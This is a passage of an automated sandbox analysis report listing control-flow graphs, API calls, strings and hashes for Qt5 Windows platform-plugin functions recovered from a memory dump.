                                                                                                                                                                                                                control_flow_graph 273 7ffafacf2b80-7ffafacf2c41 ??0?$QVector@VQPointF@@@@QEAA@XZ * 4 ??4QString@@QEAAAEAV0@AEBV0@@Z ??1QString@@QEAA@XZ ?utf16@QString@@QEBAPEBGXZ ?load@QSystemLibrary@@SAPEAUHINSTANCE__@@PEB_W_N@Z 274 7ffafacf2c67 273->274 275 7ffafacf2c43-7ffafacf2c56 GetProcAddress 273->275 277 7ffafacf2c6c-7ffafacf2c7f 274->277 275->274 276 7ffafacf2c58 275->276 280 7ffafacf2c5d-7ffafacf2c65 276->280 278 7ffafacf2d59-7ffafacf2d73 277->278 279 7ffafacf2c85-7ffafacf2ce7 ??0QByteArray@@QEAA@$$QEAV0@@Z * 3 277->279 287 7ffafacf2d79-7ffafacf2e15 call 7ffafacf2820 ??4QUrl@@QEAAAEAV0@$$QEAV0@@Z * 3 ??1QString@@QEAA@XZ ??1QByteArray@@QEAA@XZ * 2 call 7ffafacb1ee0 278->287 288 7ffafacf2f0b-7ffafacf2f6d ??0QByteArray@@QEAA@$$QEAV0@@Z * 3 278->288 281 7ffafacf2ce9 279->281 282 7ffafacf2cef-7ffafacf2d24 ??1QString@@QEAA@XZ * 2 ??1QByteArray@@QEAA@XZ * 2 279->282 280->277 281->282 283 7ffafacf2fef-7ffafacf301b call 7ffafada2750 282->283 284 7ffafacf2d2a-7ffafacf2d32 282->284 284->283 286 7ffafacf2d38-7ffafacf2d3f 284->286 290 7ffafacf2d45-7ffafacf2d48 286->290 291 7ffafacf2fcf-7ffafacf2fdc ?deallocate@QArrayData@@SAXPEAU1@_K1@Z 286->291 287->288 306 7ffafacf2e1b-7ffafacf2e23 287->306 292 7ffafacf2f75-7ffafacf2faa ??1QString@@QEAA@XZ * 2 ??1QByteArray@@QEAA@XZ * 2 288->292 293 7ffafacf2f6f 288->293 296 7ffafacf2fe2-7ffafacf2fea call 7ffafada20d0 290->296 297 7ffafacf2d4e-7ffafacf2d54 290->297 291->296 292->283 298 7ffafacf2fac-7ffafacf2fb4 292->298 293->292 296->283 300 7ffafacf2fc4-7ffafacf2fcd 297->300 298->283 301 7ffafacf2fb6-7ffafacf2fbd 298->301 300->291 300->296 301->291 304 7ffafacf2fbf-7ffafacf2fc2 301->304 304->296 304->300 306->288 307 7ffafacf2e29-7ffafacf2e41 306->307 309 7ffafacf2e47-7ffafacf2e4c 307->309 310 7ffafacf2f03 307->310 311 7ffafacf2e50-7ffafacf2e53 309->311 310->288 312 7ffafacf2e55-7ffafacf2e6d 311->312 313 7ffafacf2e80-7ffafacf2e85 311->313 316 7ffafacf2e6f-7ffafacf2e79 312->316 317 7ffafacf2e7b 312->317 313->311 314 7ffafacf2e87 313->314 314->310 316->317 318 7ffafacf2e89-7ffafacf2eb4 call 7ffafada3302 EnumDisplayDevicesW 316->318 317->313 318->310 321 7ffafacf2eb6-7ffafacf2ebd 318->321 322 7ffafacf2ed8-7ffafacf2efd ?fromWCharArray@QString@@SA?AV1@PEB_WH@Z ??4QUrl@@QEAAAEAV0@$$QEAV0@@Z ??1QString@@QEAA@XZ 321->322 323 7ffafacf2ebf-7ffafacf2ed4 EnumDisplayDevicesW 321->323 322->310 323->321 324 7ffafacf2ed6 323->324 324->310
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000015.00000002.2230402529.00007FFAFACB1000.00000020.00000001.01000000.00000065.sdmp, Offset: 00007FFAFACB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000015.00000002.2230320611.00007FFAFACB0000.00000002.00000001.01000000.00000065.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000015.00000002.2230636415.00007FFAFADA4000.00000002.00000001.01000000.00000065.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000015.00000002.2230712127.00007FFAFAE04000.00000004.00000001.01000000.00000065.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000015.00000002.2230768683.00007FFAFAE07000.00000008.00000001.01000000.00000065.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000015.00000002.2230818598.00007FFAFAE08000.00000004.00000001.01000000.00000065.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000015.00000002.2230862601.00007FFAFAE0A000.00000004.00000001.01000000.00000065.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000015.00000002.2230902204.00007FFAFAE0B000.00000002.00000001.01000000.00000065.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_21_2_7ffafacb0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Array@@Byte$V0@@$String@@$A@$$$??0?$F@@@@PointUrl@@V0@$$Vector@$DevicesDisplayEnum$?deallocate@?from?load@?utf16@AddressArrayArray@CharData@@E__@@Library@@ProcSystemU1@_
                                                                                                                                                                                                                • String ID: Direct3DCreate9
                                                                                                                                                                                                                • API String ID: 2935648489-2790205071
                                                                                                                                                                                                                • Opcode ID: 151f5ead8b53d1d5e40d4ccd2282dbfeed1c8521c8b4dfb05b2697151494e8cc
                                                                                                                                                                                                                • Instruction ID: b711fc7c3fe8ddaf969bed37a9940f0b11edd3b0a7e605de96be46bb802d8935
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 151f5ead8b53d1d5e40d4ccd2282dbfeed1c8521c8b4dfb05b2697151494e8cc
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 54D18532608A4696EB10CF54E4507ED77B0FB86749F408076EA5E47AA8EF3CE549CB40

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00007FFAFACBFB80: ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE ref: 00007FFAFACBFBBE
                                                                                                                                                                                                                  • Part of subcall function 00007FFAFACBFB80: ?append@QString@@QEAAAEAV1@AEBV1@@Z.QT5CORE ref: 00007FFAFACBFBCF
                                                                                                                                                                                                                  • Part of subcall function 00007FFAFACBFB80: ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FFAFACF7F74), ref: 00007FFAFACBFC04
                                                                                                                                                                                                                  • Part of subcall function 00007FFAFACBFB80: GetModuleHandleW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FFAFACF7F74), ref: 00007FFAFACBFC0C
                                                                                                                                                                                                                  • Part of subcall function 00007FFAFACBFB80: ?utf16@QString@@QEBAPEBGXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FFAFACF7F74), ref: 00007FFAFACBFC1A
                                                                                                                                                                                                                  • Part of subcall function 00007FFAFACBFB80: CreateWindowExW.USER32 ref: 00007FFAFACBFC68
                                                                                                                                                                                                                  • Part of subcall function 00007FFAFACBFB80: ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFAFACBFC76
                                                                                                                                                                                                                • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FFAFACFF946
                                                                                                                                                                                                                • ?qErrnoWarning@@YAXPEBDZZ.QT5CORE ref: 00007FFAFACFF97B
                                                                                                                                                                                                                • SetClipboardViewer.USER32 ref: 00007FFAFACFF98B
                                                                                                                                                                                                                • ?isDebugEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE ref: 00007FFAFACFF99D
                                                                                                                                                                                                                • ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE ref: 00007FFAFACFF9C6
                                                                                                                                                                                                                • ?debug@QMessageLogger@@QEBA?AVQDebug@@XZ.QT5CORE ref: 00007FFAFACFF9D4
                                                                                                                                                                                                                • ??6QDebug@@QEAAAEAV0@PEBD@Z.QT5CORE ref: 00007FFAFACFF9E4
                                                                                                                                                                                                                • ??6QDebug@@QEAAAEAV0@PEBD@Z.QT5CORE ref: 00007FFAFACFF9F4
                                                                                                                                                                                                                • ??6QDebug@@QEAAAEAV0@PEBX@Z.QT5CORE ref: 00007FFAFACFFA01
                                                                                                                                                                                                                • ??6QDebug@@QEAAAEAV0@PEBD@Z.QT5CORE ref: 00007FFAFACFFA11
                                                                                                                                                                                                                • ??6QDebug@@QEAAAEAV0@_N@Z.QT5CORE ref: 00007FFAFACFFA1E
                                                                                                                                                                                                                • ??6QDebug@@QEAAAEAV0@PEBD@Z.QT5CORE ref: 00007FFAFACFFA2E
                                                                                                                                                                                                                • ??6QDebug@@QEAAAEAV0@PEBX@Z.QT5CORE ref: 00007FFAFACFFA3B
                                                                                                                                                                                                                • ??1QDebug@@QEAA@XZ.QT5CORE ref: 00007FFAFACFFA46
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000015.00000002.2230402529.00007FFAFACB1000.00000020.00000001.01000000.00000065.sdmp, Offset: 00007FFAFACB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000015.00000002.2230320611.00007FFAFACB0000.00000002.00000001.01000000.00000065.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000015.00000002.2230636415.00007FFAFADA4000.00000002.00000001.01000000.00000065.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000015.00000002.2230712127.00007FFAFAE04000.00000004.00000001.01000000.00000065.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000015.00000002.2230768683.00007FFAFAE07000.00000008.00000001.01000000.00000065.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000015.00000002.2230818598.00007FFAFAE08000.00000004.00000001.01000000.00000065.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000015.00000002.2230862601.00007FFAFAE0A000.00000004.00000001.01000000.00000065.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000015.00000002.2230902204.00007FFAFAE0B000.00000002.00000001.01000000.00000065.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_21_2_7ffafacb0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Debug@@$String@@$Logger@@Message$?append@?debug@?utf16@Array@@ByteCategory@@ClipboardCreateDebugEnabled@ErrnoH00@HandleLoggingModuleV0@@V0@_V1@@ViewerWarning@@Window
                                                                                                                                                                                                                • String ID: AddClipboardFormatListener() failed.$QWindowsClipboard::registerViewer$QtClipboardView$format listener:$m_clipboardViewer:$next:
                                                                                                                                                                                                                • API String ID: 1923973217-864732125
                                                                                                                                                                                                                • Opcode ID: e7eeaa0619bf276901a392ed4ff4a18870c1f43419b67d4809080eb5d81e8277
                                                                                                                                                                                                                • Instruction ID: 7c0f9898052b874b8618d07d492e3584cb2caee26c5cc6d4230fbf97b6c55b64
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e7eeaa0619bf276901a392ed4ff4a18870c1f43419b67d4809080eb5d81e8277
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E0311825A18A4692EB00DB61E8542E933A5FF87B85F4081B7C96E0A3E5FF3CE548C750

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 485 7ffafacbbf90-7ffafacbbff9 ?window@QPlatformWindow@@QEBAPEAVQWindow@@XZ ?flags@QWindow@@QEBA?AV?$QFlags@W4WindowType@Qt@@@@XZ ?type@QWindow@@QEBA?AW4WindowType@Qt@@XZ ?isTopLevel@QWindow@@QEBA_NXZ 486 7ffafacbc098-7ffafacbc0a1 485->486 487 7ffafacbbfff-7ffafacbc012 ?windowStates@QWindow@@QEBA?AV?$QFlags@W4WindowState@Qt@@@@XZ 485->487 488 7ffafacbc0a3-7ffafacbc0a7 486->488 489 7ffafacbc0a9-7ffafacbc0c6 ?property@QObject@@QEBA?AVQVariant@@PEBD@Z 486->489 490 7ffafacbc014-7ffafacbc01b 487->490 491 7ffafacbc04a-7ffafacbc057 call 7ffafacbc7e0 487->491 488->489 493 7ffafacbc0e2-7ffafacbc0e7 488->493 494 7ffafacbc0e9-7ffafacbc0ee ??1QVariant@@QEAA@XZ 489->494 495 7ffafacbc0c8-7ffafacbc0d5 ?toBool@QVariant@@QEBA_NXZ 489->495 496 7ffafacbc02d 490->496 497 7ffafacbc01d-7ffafacbc025 IsWindowVisible 490->497 491->486 505 7ffafacbc059-7ffafacbc066 491->505 498 7ffafacbc0f4-7ffafacbc105 ?windowStates@QWindow@@QEBA?AV?$QFlags@W4WindowState@Qt@@@@XZ 493->498 494->498 495->494 501 7ffafacbc0d7-7ffafacbc0dc ??1QVariant@@QEAA@XZ 495->501 499 7ffafacbc02f-7ffafacbc048 496->499 497->496 502 7ffafacbc027-7ffafacbc02b 497->502 503 7ffafacbc107 498->503 504 7ffafacbc10e-7ffafacbc124 ShowWindow 498->504 499->486 501->493 502->499 503->504 506 7ffafacbc172-7ffafacbc175 504->506 507 7ffafacbc126-7ffafacbc16c GetWindowLongPtrW call 7ffafacba7b0 SetWindowPos 504->507 505->486 508 7ffafacbc068-7ffafacbc06d 505->508 510 7ffafacbc1a8-7ffafacbc1d4 call 7ffafada2750 506->510 511 7ffafacbc177-7ffafacbc193 GetWindowPlacement 506->511 507->506 508->486 509 7ffafacbc06f-7ffafacbc093 GetWindowLongPtrW call 7ffafacba7b0 508->509 509->486 511->510 513 7ffafacbc195-7ffafacbc1a2 SetWindowPlacement 511->513 513->510
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000015.00000002.2230402529.00007FFAFACB1000.00000020.00000001.01000000.00000065.sdmp, Offset: 00007FFAFACB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000015.00000002.2230320611.00007FFAFACB0000.00000002.00000001.01000000.00000065.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000015.00000002.2230636415.00007FFAFADA4000.00000002.00000001.01000000.00000065.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000015.00000002.2230712127.00007FFAFAE04000.00000004.00000001.01000000.00000065.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000015.00000002.2230768683.00007FFAFAE07000.00000008.00000001.01000000.00000065.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000015.00000002.2230818598.00007FFAFAE08000.00000004.00000001.01000000.00000065.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000015.00000002.2230862601.00007FFAFAE0A000.00000004.00000001.01000000.00000065.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000015.00000002.2230902204.00007FFAFAE0B000.00000002.00000001.01000000.00000065.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_21_2_7ffafacb0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Window$Window@@$Variant@@$Flags@Qt@@@@$?windowLongPlacementState@States@Type@$?flags@?property@?type@?window@Bool@Level@Object@@PlatformQt@@ShowVisible
                                                                                                                                                                                                                • String ID: ,$_q_showWithoutActivating
                                                                                                                                                                                                                • API String ID: 3956286184-3675458727
                                                                                                                                                                                                                • Opcode ID: a6ea02ad0068b7cbb60bc757578e15b2f26def015feefad69516399dc5fe0f02
                                                                                                                                                                                                                • Instruction ID: 81991cf580a9bcd6a036ff6e3e158e29573915bf7a8aab78fbd4dea766f3927d
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a6ea02ad0068b7cbb60bc757578e15b2f26def015feefad69516399dc5fe0f02
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5B519432B0C64186EB508F66E4443BA77A0FB8AB94F448176DE6E4B7D5EF3DD44A8700
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000015.00000002.2230402529.00007FFAFACB1000.00000020.00000001.01000000.00000065.sdmp, Offset: 00007FFAFACB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000015.00000002.2230320611.00007FFAFACB0000.00000002.00000001.01000000.00000065.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000015.00000002.2230636415.00007FFAFADA4000.00000002.00000001.01000000.00000065.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000015.00000002.2230712127.00007FFAFAE04000.00000004.00000001.01000000.00000065.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000015.00000002.2230768683.00007FFAFAE07000.00000008.00000001.01000000.00000065.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000015.00000002.2230818598.00007FFAFAE08000.00000004.00000001.01000000.00000065.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000015.00000002.2230862601.00007FFAFAE0A000.00000004.00000001.01000000.00000065.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000015.00000002.2230902204.00007FFAFAE0B000.00000002.00000001.01000000.00000065.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_21_2_7ffafacb0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memset$Latin1PlatformString@@String@@@Theme@@
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3555848147-0
                                                                                                                                                                                                                • Opcode ID: 2b7b06ac4bc55630a7305bd561d7ead3279de532489e7a940e86826bd4c64cb3
                                                                                                                                                                                                                • Instruction ID: b016dcf1684bf6c5dbd05a9a7d4dd63bd63eaf61ab13126c9b6480bcf6f8a432
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2b7b06ac4bc55630a7305bd561d7ead3279de532489e7a940e86826bd4c64cb3
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3731D462A08B8581EB159F52F5402F9A361FF4ABD4F088272DABD0B7D6EE3DD1528740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00007FFAFADA208C: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFAFACB11ED), ref: 00007FFAFADA20A6
                                                                                                                                                                                                                • ??0QEventDispatcherWin32@@QEAA@PEAVQObject@@@Z.QT5CORE ref: 00007FFAFAD12D29
                                                                                                                                                                                                                • ?setObjectName@QObject@@QEAAXAEBVQString@@@Z.QT5CORE ref: 00007FFAFAD12D54
                                                                                                                                                                                                                • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FFAFAD12D5F
                                                                                                                                                                                                                • ?createInternalHwnd@QEventDispatcherWin32@@IEAAXXZ.QT5CORE ref: 00007FFAFAD12D68
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000015.00000002.2230402529.00007FFAFACB1000.00000020.00000001.01000000.00000065.sdmp, Offset: 00007FFAFACB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000015.00000002.2230320611.00007FFAFACB0000.00000002.00000001.01000000.00000065.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000015.00000002.2230636415.00007FFAFADA4000.00000002.00000001.01000000.00000065.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000015.00000002.2230712127.00007FFAFAE04000.00000004.00000001.01000000.00000065.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000015.00000002.2230768683.00007FFAFAE07000.00000008.00000001.01000000.00000065.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000015.00000002.2230818598.00007FFAFAE08000.00000004.00000001.01000000.00000065.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000015.00000002.2230862601.00007FFAFAE0A000.00000004.00000001.01000000.00000065.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000015.00000002.2230902204.00007FFAFAE0B000.00000002.00000001.01000000.00000065.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_21_2_7ffafacb0000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: DispatcherEventWin32@@$?create?setHwnd@InternalName@ObjectObject@@Object@@@String@@String@@@malloc
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 4121027395-0
                                                                                                                                                                                                                • Opcode ID: cf12d162ae20b1693ff80ea38a9cf383b10e981b69df5bd842285f1abdf1835c
                                                                                                                                                                                                                • Instruction ID: 5a05367984004e173ec86f2c9b60194c68a18d9745786b51e0187c5febb23db8
                                                                                                                                                                                                                • Opcode Fuzzy Hash: cf12d162ae20b1693ff80ea38a9cf383b10e981b69df5bd842285f1abdf1835c
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6CF09A21B19B0782EB089F12F8442E92360FF8AB41F449072D92F0B3A5FF7CE1998740